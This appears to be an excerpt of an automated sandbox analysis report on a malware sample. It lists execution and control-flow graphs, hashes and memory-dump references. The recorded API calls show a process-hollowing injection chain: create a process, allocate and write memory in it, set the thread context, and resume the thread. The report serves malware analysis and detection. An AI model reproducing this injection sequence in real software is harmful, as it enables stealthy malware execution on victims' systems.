                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                    • Instruction ID: 88ee5d8abf8b873c090f2edc149370530f3e473ae6df4823d78e27d5b3b909a5
                                                    • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                    • Instruction Fuzzy Hash: C601A77020CB0C4FD788EF0CE051AA6B3E0FB89324F10056DE58AC36A1D636E882CB41
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.1783596865.00007FFD9B6B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6B0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_7ffd9b6b0000_powershell.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: eeacb285f6c8e224bf7d875ae71adea5b308cf714d5c2a64cea4ec45832e7f15
                                                    • Instruction ID: f6e4f90ce31b786c2e8a489394a90ac3b8c7c29bee89fc104d6b357d4d13d3f0
                                                    • Opcode Fuzzy Hash: eeacb285f6c8e224bf7d875ae71adea5b308cf714d5c2a64cea4ec45832e7f15
                                                    • Instruction Fuzzy Hash: 00E02623F1ED3D0AE7B1A99C2826AF4A3D0EF54A60B4605B3E82CC75A6DC04BC1003D0

                                                    Execution Graph

                                                    Execution Coverage:27.6%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0%
                                                    Total number of Nodes:126
                                                    Total number of Limit Nodes:3
                                                    execution_graph 2627 fa4728 2629 fa474c 2627->2629 2628 fa4822 2629->2628 2632 fa5633 2629->2632 2651 fa50e0 2629->2651 2633 fa53fa 2632->2633 2639 fa562e 2633->2639 2670 fa5770 2633->2670 2674 fa5761 2633->2674 2635 fa549f 2686 fa5fb0 2635->2686 2636 fa54e9 2690 fa6150 2636->2690 2694 fa6141 2636->2694 2637 fa55ef 2698 fa6728 2637->2698 2704 fa6719 2637->2704 2638 fa5607 2710 fa6af0 2638->2710 2718 fa6b00 2638->2718 2639->2628 2652 fa50e5 2651->2652 2658 fa562e 2652->2658 2659 fa5770 CreateProcessA 2652->2659 2660 fa5761 CreateProcessA 2652->2660 2653 fa540c 2664 fa5d58 Wow64SetThreadContext 2653->2664 2665 fa5d49 Wow64SetThreadContext 2653->2665 2654 fa549f 2663 fa5fb0 ReadProcessMemory 2654->2663 2655 fa55ef 2661 fa6728 WriteProcessMemory 2655->2661 2662 fa6719 WriteProcessMemory 2655->2662 2656 fa5607 2668 fa6af0 3 API calls 2656->2668 2669 fa6b00 3 API calls 2656->2669 2657 fa54e9 2666 fa6150 VirtualAllocEx 2657->2666 2667 fa6141 VirtualAllocEx 2657->2667 2658->2628 2659->2653 2660->2653 2661->2656 2662->2656 2663->2657 2664->2654 2665->2654 2666->2655 2667->2655 2668->2658 2669->2658 2671 fa5794 2670->2671 2726 fa4fb4 2671->2726 2675 fa5794 2674->2675 2676 fa4fb4 CreateProcessA 2675->2676 2677 fa540c 2676->2677 2678 fa5d58 2677->2678 2682 fa5d49 2677->2682 2679 fa5d74 2678->2679 2681 fa5df0 2679->2681 2730 fa4fcc 2679->2730 2681->2635 2683 fa5d74 2682->2683 2684 fa4fcc Wow64SetThreadContext 2683->2684 2685 fa5df0 2683->2685 2684->2685 2685->2635 2687 fa5fcd 2686->2687 2734 fa4ff4 2687->2734 2691 fa6177 2690->2691 2738 fa500c 2691->2738 2695 fa6177 2694->2695 2696 fa500c VirtualAllocEx 2695->2696 2697 fa61bf 2696->2697 2697->2637 2699 fa6752 2698->2699 2742 fa50a4 2699->2742 2701 fa6988 2701->2638 2702 fa50a4 WriteProcessMemory 2703 fa67db 2702->2703 2703->2701 2703->2702 2705 fa6752 2704->2705 2706 fa50a4 WriteProcessMemory 2705->2706 2709 fa67db 2706->2709 2707 fa6988 2707->2638 2708 fa50a4 WriteProcessMemory 2708->2709 2709->2707 2709->2708 2711 fa6b00 2710->2711 2712 fa50a4 WriteProcessMemory 2711->2712 2713 fa6b8c 2712->2713 2717 fa6c3f 2713->2717 2746 fa50bc 2713->2746 2716 fa6cc8 2716->2639 2750 fa50d4 2717->2750 2719 fa6b27 2718->2719 2720 fa50a4 WriteProcessMemory 2719->2720 2721 fa6b8c 2720->2721 2722 fa50bc Wow64SetThreadContext 2721->2722 2724 fa6c3f 2721->2724 2722->2724 2723 fa50d4 ResumeThread 2725 fa6cc8 2723->2725 2724->2723 2725->2639 2727 fa5878 CreateProcessA 2726->2727 2729 fa5bb0 2727->2729 2731 fa5e90 Wow64SetThreadContext 2730->2731 2733 fa5f53 2731->2733 2733->2681 2735 fa6020 ReadProcessMemory 2734->2735 2737 fa5ff3 2735->2737 2737->2636 2739 fa6240 VirtualAllocEx 2738->2739 2741 fa61bf 2739->2741 2741->2637 2743 fa69a8 WriteProcessMemory 2742->2743 2745 fa6a8f 2743->2745 2745->2703 2747 fa5e90 Wow64SetThreadContext 2746->2747 2749 fa5f53 2747->2749 2749->2717 2751 fa6d38 ResumeThread 2750->2751 2753 fa6dc7 2751->2753 2753->2716 2762 fa5e88 2763 fa5e76 2762->2763 2765 fa5e8f Wow64SetThreadContext 2762->2765 2766 fa5f53 2765->2766 2787 fa4718 2789 fa474c 2787->2789 2788 fa4822 2789->2788 2790 fa5633 7 API calls 2789->2790 2791 fa50e0 7 API calls 2789->2791 2790->2788 2791->2788 2783 fa4f6c 2784 fa4f75 ReadProcessMemory 2783->2784 2786 fa60e6 2784->2786 2754 fa50b0 2755 fa50b5 2754->2755 2756 fa505d WriteProcessMemory 2755->2756 2758 fa50bb Wow64SetThreadContext 2755->2758 2761 fa6a8f 2756->2761 2759 fa5f53 2758->2759 2767 fa5060 2768 fa505d 2767->2768 2768->2767 2769 fa6a2e WriteProcessMemory 2768->2769 2770 fa6a8f 2769->2770 2774 fa5000 2775 fa4ff2 2774->2775 2775->2774 2776 fa6288 VirtualAllocEx 2775->2776 2777 fa62fe 2776->2777 2778 fa69a0 2779 fa698e 2778->2779 2780 fa69a7 WriteProcessMemory 2778->2780 2782 fa6a8f 2780->2782
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: H$xE$$^q
                                                    • API String ID: 0-1424132272
                                                    • Opcode ID: c7dcab6a6bc04a1f950d4a9a1671daadbccf867d021e02d9a63c0304f4779070
                                                    • Instruction ID: 9ccab1709e548c6e480fe06a2d74105203b89d17141574ceef6928081bea3569
                                                    • Opcode Fuzzy Hash: c7dcab6a6bc04a1f950d4a9a1671daadbccf867d021e02d9a63c0304f4779070
                                                    • Instruction Fuzzy Hash: 5552D5B4E01259CFDB64DF69D980A8EFBB2BF49310F15D199E408AB212DB30AD81CF55
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: H$xE$$^q
                                                    • API String ID: 0-1424132272
                                                    • Opcode ID: e7f016fade193b3abb972566290313a7511b45e56c853ced9bb6aea3f65a88e1
                                                    • Instruction ID: 73759d33b7eca9a0f17f9b687c6348a20ffd98513031bc7d17ff702e16e5478d
                                                    • Opcode Fuzzy Hash: e7f016fade193b3abb972566290313a7511b45e56c853ced9bb6aea3f65a88e1
                                                    • Instruction Fuzzy Hash: 60D10770E052688FDB29DF69C8507DEBBB2BF89300F10C4EAD449A7265DB744A85CF51
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 262e62ba73ed08561eb7188897089a46b962a45e3f01108fc78aac96251eff46
                                                    • Instruction ID: 03db5fb7f23aecb5a1388fd5dc04ed08b759fd279701dabe49ce722dcfb990ae
                                                    • Opcode Fuzzy Hash: 262e62ba73ed08561eb7188897089a46b962a45e3f01108fc78aac96251eff46
                                                    • Instruction Fuzzy Hash: F84290B4E01218CFDB64CFA9C984B9DBBB2BF49310F1081A9E809A7355D730AE85DF50

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 fa4fb4-fa591b 3 fa597d-fa59a8 0->3 4 fa591d-fa594d 0->4 7 fa5a0a-fa5a63 3->7 8 fa59aa-fa59da 3->8 4->3 12 fa594f-fa5954 4->12 13 fa5ac2-fa5bae CreateProcessA 7->13 14 fa5a65-fa5a92 7->14 8->7 23 fa59dc-fa59e1 8->23 15 fa5956-fa5960 12->15 16 fa5977-fa597a 12->16 39 fa5bb0-fa5bb6 13->39 40 fa5bb7-fa5c91 13->40 14->13 31 fa5a94-fa5a99 14->31 17 fa5962 15->17 18 fa5964-fa5973 15->18 16->3 17->18 18->18 20 fa5975 18->20 20->16 24 fa59e3-fa59ed 23->24 25 fa5a04-fa5a07 23->25 28 fa59ef 24->28 29 fa59f1-fa5a00 24->29 25->7 28->29 29->29 30 fa5a02 29->30 30->25 33 fa5a9b-fa5aa5 31->33 34 fa5abc-fa5abf 31->34 35 fa5aa9-fa5ab8 33->35 36 fa5aa7 33->36 34->13 35->35 38 fa5aba 35->38 36->35 38->34 39->40 51 fa5c93-fa5c97 40->51 52 fa5ca1-fa5ca5 40->52 51->52 55 fa5c99 51->55 53 fa5ca7-fa5cab 52->53 54 fa5cb5-fa5cb9 52->54 53->54 56 fa5cad 53->56 57 fa5cbb-fa5cbf 54->57 58 fa5cc9-fa5ccd 54->58 55->52 56->54 57->58 59 fa5cc1 57->59 60 fa5ccf-fa5cf8 58->60 61 fa5d03-fa5d0e 58->61 59->58 60->61 64 fa5d0f 61->64 64->64
                                                    APIs
                                                    • CreateProcessA.KERNELBASE(?,?,03C9358C,03C93590,00FA580E,?,?,?,?,?), ref: 00FA5B9B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: CreateProcess
                                                    • String ID: Lg$Lg$Lg
                                                    • API String ID: 963392458-2406436663
                                                    • Opcode ID: 72011e2266886f548b96e5072ff010dc6070cb899476b16f69117b129d40addc
                                                    • Instruction ID: d2f5992dcf0bd6988d6bc478687a052d4411544216316151945e5fd3cf24d748
                                                    • Opcode Fuzzy Hash: 72011e2266886f548b96e5072ff010dc6070cb899476b16f69117b129d40addc
                                                    • Instruction Fuzzy Hash: E0D126B0D006198FDB24CFA8C881BEDBBF1BB49714F0091AAE449B7250DB749E85DF95

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 442 fa50a4-fa6a17 445 fa6a19-fa6a2b 442->445 446 fa6a2e-fa6a8d WriteProcessMemory 442->446 445->446 447 fa6a8f-fa6a95 446->447 448 fa6a96-fa6ae0 446->448 447->448
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 00FA6A7D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID: 4b
                                                    • API String ID: 3559483778-2006924296
                                                    • Opcode ID: 3f9a01fbf83b91547df8585b6d3bfb7ec5c530990d7406fcfb0f588ba6147f43
                                                    • Instruction ID: 8e3c6daa4330275895505041dfeac7e9680038733aa2e89da1a72d4fd3863dab
                                                    • Opcode Fuzzy Hash: 3f9a01fbf83b91547df8585b6d3bfb7ec5c530990d7406fcfb0f588ba6147f43
                                                    • Instruction Fuzzy Hash: 594168B5D002589FCF10CFA9D984AEEFBF1BB59310F24902AE818BB210D375A945DF64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 452 fa4ff4-fa60e4 ReadProcessMemory 455 fa60ed-fa6137 452->455 456 fa60e6-fa60ec 452->456 456->455
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(00000004,?,00FA5FF3,?,?), ref: 00FA60D4
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID: `b
                                                    • API String ID: 1726664587-3121370371
                                                    • Opcode ID: b24b60fc6e2577e28f5777ec10e5ed897e2af5f88130e7fa1e3343570ae2cf3f
                                                    • Instruction ID: bb2f6d332390905227806f87fdbad41a5bacdadc00caf97a1cdc0efcd2142230
                                                    • Opcode Fuzzy Hash: b24b60fc6e2577e28f5777ec10e5ed897e2af5f88130e7fa1e3343570ae2cf3f
                                                    • Instruction Fuzzy Hash: 964177B5D052589FCF10CFA9D984ADEFBB1BB09310F24902AE818B7210D375A945DF64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 460 fa50d4-fa6dc5 ResumeThread 463 fa6dce-fa6e08 460->463 464 fa6dc7-fa6dcd 460->464 464->463
                                                    APIs
                                                    • ResumeThread.KERNELBASE(00000000), ref: 00FA6DB5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: ResumeThread
                                                    • String ID: ,a
                                                    • API String ID: 947044025-901402533
                                                    • Opcode ID: 69790526867d1ac3cd5ab18dd57f96d3f757f41da30900e8c1659018ecce151f
                                                    • Instruction ID: ffdcb1a5fe71d0b90c04e0c1fa2042d3e9133f47eb5c21f94d08c385d9094937
                                                    • Opcode Fuzzy Hash: 69790526867d1ac3cd5ab18dd57f96d3f757f41da30900e8c1659018ecce151f
                                                    • Instruction Fuzzy Hash: BA31ABB4E01258DFCB10CFA9D584A9EFBF4EB09310F24902AE918B7310D775A941CFA4

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 523 fa50b0-fa50b8 525 fa50bb-fa5ef4 523->525 526 fa50a2-fa50a3 523->526 533 fa5f0b-fa5f51 Wow64SetThreadContext 525->533 534 fa5ef6-fa5f08 525->534 527 fa505d-fa5067 526->527 528 fa50a5-fa6a17 526->528 527->526 538 fa6a19-fa6a2b 528->538 539 fa6a2e-fa6a8d WriteProcessMemory 528->539 536 fa5f5a-fa5f9e 533->536 537 fa5f53-fa5f59 533->537 534->533 537->536 538->539 540 fa6a8f-fa6a95 539->540 541 fa6a96-fa6ae0 539->541 540->541
                                                    APIs
                                                    • Wow64SetThreadContext.KERNELBASE(?,?), ref: 00FA5F41
                                                    • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 00FA6A7D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: ContextMemoryProcessThreadWow64Write
                                                    • String ID:
                                                    • API String ID: 3696009080-0
                                                    • Opcode ID: 3cbcfcdbd18ac8f2806322fb4fa7e76f4d695eb962067d05c2871a0b84cefc55
                                                    • Instruction ID: 151df91e04d4d22abdff853be315c621532e6a030b0505faf1dec864543cb4e0
                                                    • Opcode Fuzzy Hash: 3cbcfcdbd18ac8f2806322fb4fa7e76f4d695eb962067d05c2871a0b84cefc55
                                                    • Instruction Fuzzy Hash: E6919AB5D052589FCB10CFA9D984AEEFBF1BB09310F24906AE818B7310D375A945DF64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 584 fa4f6c-fa4f78 586 fa4f7a-fa4f8a 584->586 587 fa4fe2-fa4ff1 584->587 590 fa4fda-fa4fdf 586->590 587->590 591 fa4ff3-fa60e4 ReadProcessMemory 587->591 590->587 594 fa60ed-fa6137 591->594 595 fa60e6-fa60ec 591->595 595->594
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(00000004,?,00FA5FF3,?,?), ref: 00FA60D4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: 65370c3e90a2e728ec4ac456d0337975d1981c974d6020eb482d77aaee499650
                                                    • Instruction ID: 2613423355eba502f69912a53c836955d76b85e7204b9a73cb2061daa8f135c0
                                                    • Opcode Fuzzy Hash: 65370c3e90a2e728ec4ac456d0337975d1981c974d6020eb482d77aaee499650
                                                    • Instruction Fuzzy Hash: 7141F1B5C092989FCB01DFA9D940ADDFFF0AF0A310F14906AE454BB251D374A945CB68

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 599 fa69a0-fa69a4 600 fa698e-fa698f 599->600 601 fa69a7-fa6a17 599->601 603 fa6a19-fa6a2b 601->603 604 fa6a2e-fa6a8d WriteProcessMemory 601->604 603->604 605 fa6a8f-fa6a95 604->605 606 fa6a96-fa6ae0 604->606 605->606
                                                    APIs
                                                    • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 00FA6A7D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessWrite
                                                    • String ID:
                                                    • API String ID: 3559483778-0
                                                    • Opcode ID: e86c8670ce16bd31b590bf8c23945470d2b4d767d96b4bfeb0245c2da66f2568
                                                    • Instruction ID: 14fe33bc4b16dc1c41d5f606b8524cc33d5f47e5440d69ad4387c78e6e3c8551
                                                    • Opcode Fuzzy Hash: e86c8670ce16bd31b590bf8c23945470d2b4d767d96b4bfeb0245c2da66f2568
                                                    • Instruction Fuzzy Hash: A44178B9D002589FCF10CFA9D984AEEFBF1BB59310F24902AE818B7210D375A945DF64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 610 fa5000-fa5009 612 fa500b-fa6280 610->612 613 fa4ff2 610->613 615 fa6288-fa62fc VirtualAllocEx 612->615 613->610 616 fa62fe-fa6304 615->616 617 fa6305-fa6347 615->617 616->617
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 00FA62EC
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: d0b7c704d6c88f306d7d932633cc1fbb84ca773420276ecb84344b08ead76bfe
                                                    • Instruction ID: d03ca8d87877331af55821a0265c0b94f0e06b36a6e8908ee808c1a68c044ef4
                                                    • Opcode Fuzzy Hash: d0b7c704d6c88f306d7d932633cc1fbb84ca773420276ecb84344b08ead76bfe
                                                    • Instruction Fuzzy Hash: 0D417AB5D052589FCF10CFA9D984ADEFBF0AB1A310F24906AE818B7311D375A945CF64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 621 fa6019-fa60e4 ReadProcessMemory 623 fa60ed-fa6137 621->623 624 fa60e6-fa60ec 621->624 624->623
                                                    APIs
                                                    • ReadProcessMemory.KERNELBASE(00000004,?,00FA5FF3,?,?), ref: 00FA60D4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: MemoryProcessRead
                                                    • String ID:
                                                    • API String ID: 1726664587-0
                                                    • Opcode ID: eeb6c8c0770fcb688792ffd754cce504b4945545a4d6600e3260c33a57e89165
                                                    • Instruction ID: b5f03be5072c6b42bde6d6ff7a11fa82597c60fcaa67b0b2c73830e96f60c993
                                                    • Opcode Fuzzy Hash: eeb6c8c0770fcb688792ffd754cce504b4945545a4d6600e3260c33a57e89165
                                                    • Instruction Fuzzy Hash: 864178B5D042589FCF10CFA9D984ADEFBB1BB19310F24902AE814B7210D375A945CF64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 628 fa500c-fa62fc VirtualAllocEx 631 fa62fe-fa6304 628->631 632 fa6305-fa6347 628->632 631->632
                                                    APIs
                                                    • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 00FA62EC
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: AllocVirtual
                                                    • String ID:
                                                    • API String ID: 4275171209-0
                                                    • Opcode ID: 41f4124550840e8c8a8d623ae127debfe7432d355a406122a44001696ec13ead
                                                    • Instruction ID: 7c971d7ca2a8328c8b01bd22dc0ef01f4852cb12722a3039056449c631e5626d
                                                    • Opcode Fuzzy Hash: 41f4124550840e8c8a8d623ae127debfe7432d355a406122a44001696ec13ead
                                                    • Instruction Fuzzy Hash: 7D4158B9D052589FCF10CFA9D984A9EFBF1AB0A310F24902AE918B7314D375A945CF64

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 636 fa5e88-fa5e8d 637 fa5e8f-fa5ef4 636->637 638 fa5e76-fa5e7c 636->638 640 fa5f0b-fa5f51 Wow64SetThreadContext 637->640 641 fa5ef6-fa5f08 637->641 642 fa5f5a-fa5f9e 640->642 643 fa5f53-fa5f59 640->643 641->640 643->642
                                                    APIs
                                                    • Wow64SetThreadContext.KERNELBASE(?,?), ref: 00FA5F41
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 0188349bbab4badde1fc0c36a8b90739d13e4bab4bf0e8a1e907ce21a224552b
                                                    • Instruction ID: 08ef19d44247d358f64f1a97937b1d1563883ed73491d34285b12d7a2e8d651e
                                                    • Opcode Fuzzy Hash: 0188349bbab4badde1fc0c36a8b90739d13e4bab4bf0e8a1e907ce21a224552b
                                                    • Instruction Fuzzy Hash: 2C4178B5D052589FCF10CFAAD984ADEBBF0BB49310F24806AE819B7250D374A949CF64
                                                    APIs
                                                    • Wow64SetThreadContext.KERNELBASE(?,?), ref: 00FA5F41
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: 59f09718bee01d1d676636c1525ef7556081f3d77fbd49f374baab01cc5bdc4e
                                                    • Instruction ID: 3edad989cea29c92449e533c8513a6730577df31cf2296f5de5d52d85690bcb1
                                                    • Opcode Fuzzy Hash: 59f09718bee01d1d676636c1525ef7556081f3d77fbd49f374baab01cc5bdc4e
                                                    • Instruction Fuzzy Hash: 1F4188B5D016589FCB10CFAAD984A9EFBF0BB49324F24806AE418B7250D374A949CF64
                                                    APIs
                                                    • Wow64SetThreadContext.KERNELBASE(?,?), ref: 00FA5F41
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1745752189.0000000000FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FA0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_fa0000_x.jbxd
                                                    Similarity
                                                    • API ID: ContextThreadWow64
                                                    • String ID:
                                                    • API String ID: 983334009-0
                                                    • Opcode ID: ef95f17d061ecf1ddd023160aa57f7f27bc60b2f3c3ecbefb2377c406a0d9b6d
                                                    • Instruction ID: f16102d39632e0762373af2907c674a1201f7c3f34c731f5057b243503afd1b6
                                                    • Opcode Fuzzy Hash: ef95f17d061ecf1ddd023160aa57f7f27bc60b2f3c3ecbefb2377c406a0d9b6d
                                                    • Instruction Fuzzy Hash: 7F4188B5D016589FCB10CFAAD984A9EFBF0BB49310F24802AE418B7250D374A945CF64
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1744787464.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_e6d000_x.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 300f546cf80d1c5c65ef6f1099ddafbc31d7dffb26d72027e8eedb13fad4cb94
                                                    • Instruction ID: 750fde1fcdcd7eafea7ca938aa9d1004667b26decea3e3802fe6c6de153d47ce
                                                    • Opcode Fuzzy Hash: 300f546cf80d1c5c65ef6f1099ddafbc31d7dffb26d72027e8eedb13fad4cb94
                                                    • Instruction Fuzzy Hash: 36214571A88240DFCB01DF14EDC0B26BF65FB98368F60C169E80A5B656C336D856CAA1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1744787464.0000000000E6D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E6D000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_e6d000_x.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                    • Instruction ID: 23f653437d003b9b371214d226ee3245d9242dcd0dd51a3b748d859f55e9c99d
                                                    • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                    • Instruction Fuzzy Hash: E411D676944280CFCB15CF14D9C4B16BF71FB94328F24C5A9D8454B656C336D456CB91

                                                    Execution Graph

                                                    Execution Coverage:0.9%
                                                    Dynamic/Decrypted Code Coverage:5.9%
                                                    Signature Coverage:9.8%
                                                    Total number of Nodes:102
                                                    Total number of Limit Nodes:9
                                                    execution_graph 76109 42c083 76110 42c09d 76109->76110 76113 10c2df0 LdrInitializeThunk 76110->76113 76111 42c0c5 76113->76111 76114 42fc03 76115 42fc13 76114->76115 76116 42fc19 76114->76116 76119 42ec43 76116->76119 76118 42fc3f 76122 42cdc3 76119->76122 76121 42ec5e 76121->76118 76123 42cde0 76122->76123 76124 42cdf1 RtlAllocateHeap 76123->76124 76124->76121 76131 4250d3 76132 4250ec 76131->76132 76141 428a73 76132->76141 76134 425109 76135 425134 76134->76135 76138 425174 76134->76138 76140 425179 76134->76140 76146 42eb63 76135->76146 76139 42eb63 RtlFreeHeap 76138->76139 76139->76140 76142 428ad8 76141->76142 76143 428b0f 76142->76143 76149 424de3 76142->76149 76143->76134 76145 428af1 76145->76134 76160 42ce13 76146->76160 76148 425144 76150 424d9b 76149->76150 76154 424d93 76150->76154 76156 42caa3 76150->76156 76152 424da4 76159 42ec83 RtlAllocateHeap 76152->76159 76154->76145 76155 424daf 76155->76145 76157 42cabd 76156->76157 76158 42cace NtClose 76157->76158 76158->76152 76159->76155 76161 42ce2d 76160->76161 76162 42ce3e RtlFreeHeap 76161->76162 76162->76148 76163 42fd33 76164 42fca3 76163->76164 76165 42ec43 RtlAllocateHeap 76164->76165 76167 42fd00 76164->76167 76166 42fcdd 76165->76166 76168 42eb63 RtlFreeHeap 76166->76168 76168->76167 76169 417ad3 76170 417af7 76169->76170 76171 417b33 